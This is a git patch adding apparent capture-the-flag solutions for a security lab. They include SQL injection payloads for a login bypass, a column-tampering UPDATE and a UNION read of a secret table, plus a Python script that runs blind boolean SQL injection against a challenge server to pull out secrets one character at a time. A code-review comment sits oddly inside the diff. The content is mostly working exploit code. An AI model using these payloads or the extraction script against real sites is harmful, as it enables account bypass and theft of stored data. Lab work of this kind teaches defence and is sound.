From 6ff327335195d85cbfa1ea67e52403554fbb1611 Mon Sep 17 00:00:00 2001
From: didas72
Date: Thu, 11 Dec 2025 21:33:56 +0000
Subject: [PATCH] Lab5
---
 .../chall_I_will_take_care_of_this_site.txt | 3 +
 pa/lab5/chall_money_money_money.txt | 3 +
 ...sometimes_we_are_just_temporarily_blind.py | 70 +++++++++++++++++++
 ...ll_wow_it_cant_be_more_juicy_than_this.txt | 3 +
 4 files changed, 79 insertions(+)
 create mode 100644 pa/lab5/chall_I_will_take_care_of_this_site.txt
 create mode 100644 pa/lab5/chall_money_money_money.txt
 create mode 100644 pa/lab5/chall_sometimes_we_are_just_temporarily_blind.py
 create mode 100644 pa/lab5/chall_wow_it_cant_be_more_juicy_than_this.txt
diff --git a/pa/lab5/chall_I_will_take_care_of_this_site.txt b/pa/lab5/chall_I_will_take_care_of_this_site.txt
new file mode 100644
index 0000000..aef708c
--- /dev/null
+++ b/pa/lab5/chall_I_will_take_care_of_this_site.txt
@@ -0,0 +1,3 @@
+SELECT id, username, password, bio, age, jackpot_val FROM user WHERE username = '' AND password = ''
+
+admin' OR username = '
diff --git a/pa/lab5/chall_money_money_money.txt b/pa/lab5/chall_money_money_money.txt
new file mode 100644
index 0000000..72bbc90
--- /dev/null
+++ b/pa/lab5/chall_money_money_money.txt
@@ -0,0 +1,3 @@
+UPDATE user SET bio = ''' WHERE username = 'didas'
+
+', tokens = '65666
diff --git a/pa/lab5/chall_sometimes_we_are_just_temporarily_blind.py b/pa/lab5/chall_sometimes_we_are_just_temporarily_blind.py
new file mode 100644
index 0000000..b884d35
--- /dev/null
+++ b/pa/lab5/chall_sometimes_we_are_just_temporarily_blind.py
@@ -0,0 +1,70 @@
+from requests import get
+from urllib.parse import quote
+import re
+
+BASE = "http://ssof2526.challenges.cwte.me:25262"
+PL_HEAD = "' AND id = 0 UNION "
+PL_TAIL = "--"
+
+def get_arts(payload: str) -> int:
+ final_payload = PL_HEAD + payload + PL_TAIL
+ resp = get(BASE+"/?search="+quote(final_payload))
+ content = resp.content.decode('utf-8')
+
+ result = re.search(r"Found ([0-9]+) article", content)
+ if result is None:
+ print("Payload malformed:")
+ print(payload)
+ print(content)
+ exit(1)
+
+ return int(result.group(1))
+
+def stringer(column: str, table: str, where: str = "1 = 1", max: int = 50) -> list[str]:
+ lengths = []
+ strings = []
+
+ for length in range(max):
+ length += 1
+ payload = "SELECT %s, %s, %s FROM %s WHERE LENGTH(%s) = %d AND %s;"%(column, column, column, table, column, length, where)
+
+ arts = get_arts(payload)
+
+ if arts != 0:
+ lengths.append(length)
+ print("Length %d has %s"%(length, arts))
+
+ for length in lengths:
+ print("Searching for len", length, " ", end="", flush=True)
+
+ name = ""
+
+ for _ in range(length):
+ print(".", end="", flush=True)
+ for l in "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ_()[]+-*/;:,. !\"&|{}~^`=":
+ cur_name = name + (l if l != '_' else "\\_")
+
+ payload = "SELECT %s, %s, %s FROM %s WHERE LENGTH(%s) = %d AND '%s' = substr((%s), %d, 1) AND %s;"%(column, column, column, table, column, length, l, column, len(cur_name)-1, where)
+ if (get_arts(payload) != 0):
+ name = cur_name
+ break
+
+ if name == cur_name[:-1]:
+ name = name + '_'
+
+ strings.append(name)
+ print(" found", name)
+
+ return strings
+
+#print(stringer("name", "sqlite_master"))
+#print(stringer("sql", "sqlite_master", "name == 'super_s_sof_secrets'", 100))
+print(stringer("secret", "super_s_sof_secrets", max=120))
+
+
+
+
+
+
+# SELECT id, title, content FROM blog_post WHERE title LIKE '
+#' AND id = 0 UNION SELECT id, title, content FROM blog_post WHERE title LIKE 'flag'; --
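Review bot: `exit(1)` in get_arts relies on the `exit` name that the site module injects, which is absent under `python -S` and in embedded interpreters; the robust form is `sys.exit(1)` with `import sys` added next to `import re`. The `max` parameter of stringer shadows the builtin and reads as a range bound only from context; renaming it (e.g. `max_len`) keeps intent clear, noting the `max=120` keyword call at the bottom must follow. The module-level `print(stringer(...))` executes on import, so the two helpers cannot be reused from another script without running the scan; guarding it with `if __name__ == "__main__":` fixes that. A short module docstring naming the challenge this write-up belongs to and what each helper's return value means (get_arts returns the article count parsed from the page, stringer returns one string per matched length) would let a reader follow the file without the commented-out calls, and the trailing comment would be more useful as a defensive reference if it also noted the remediation for the string-built LIKE query it records, i.e. a parameterized query.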
diff --git a/pa/lab5/chall_wow_it_cant_be_more_juicy_than_this.txt b/pa/lab5/chall_wow_it_cant_be_more_juicy_than_this.txt
new file mode 100644
index 0000000..f339e98
--- /dev/null
+++ b/pa/lab5/chall_wow_it_cant_be_more_juicy_than_this.txt
@@ -0,0 +1,3 @@
+SELECT id, title, content FROM blog_post WHERE title LIKE '%a'%' OR content LIKE '%a'%'
+
+' UNION SELECT id, title, content FROM secret_blog_post ;--